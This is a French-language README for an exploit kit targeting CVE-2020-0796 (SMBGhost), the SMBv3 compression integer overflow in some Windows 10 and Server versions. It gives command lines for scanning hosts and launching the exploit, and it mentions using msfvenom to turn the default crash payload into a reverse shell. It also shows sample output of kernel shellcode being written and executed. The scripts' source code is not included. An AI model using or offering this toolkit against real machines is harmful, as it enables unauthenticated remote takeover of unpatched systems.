
CVE-2020-0796 – Kit d'outils d'exploitation
CVE-2020-0796 est causée par une erreur dans le protocole SMBv3 lors du traitement de paquets compressés malveillants ; lors de la décompression des paquets, la longueur fournie par le client est utilisée sans vérifier sa validité, ce qui entraîne un débordement d'entier. Cela permet à un attaquant distant non authentifié d'exécuter du code arbitraire sur le système cible. Cette vulnérabilité est similaire à EternalBlue (MS17-010).
Versions affectées : Windows 10 Version 1903 for 32-bit Systems Windows 10 Version 1903 for ARM64-based Systems Windows 10 Version 1903 for x64-based Systems Windows 10 Version 1909 for 32-bit Systems Windows 10 Version 1909 for ARM64-based Systems Windows 10 Version 1909 for x64-based Systems Windows Server, version 1903 (Server Core installation) Windows Server, version 1909 (Server Core installation)
scanner.py Scanne et détecte les hôtes vulnérables à la CVE-2020-0796. Format : python scanner.py ip Exemple : python scanner.py 192.168.1.2
exploit.py Lance une attaque sur l'hôte cible vulnérable. Le PoC par défaut provoque un écran bleu. Nécessite msfvenom pour générer un PoC de reverse shell. Format : python exploit.py -ip ip Exemple : python exploit.py -ip 192.168.1.2
Résultat : [+] found low stub at phys addr 13000! [+] PML4 at 1ad000 [+] base of HAL heap at fffff79480000000 [+] ntoskrnl entry at fffff80645792010 [+] found PML4 self-ref entry 1eb [+] found HalpInterruptController at fffff79480001478 [+] found HalpApicRequestInterrupt at fffff80645cb3bb0 [+] built shellcode! [+] KUSER_SHARED_DATA PTE at fffff5fbc0000000 [+] KUSER_SHARED_DATA PTE NX bit cleared! [+] Wrote shellcode at fffff78000000a00! [+] Press a key to execute shellcode! [+] overwrote HalpInterruptController pointer, should have execution shortly...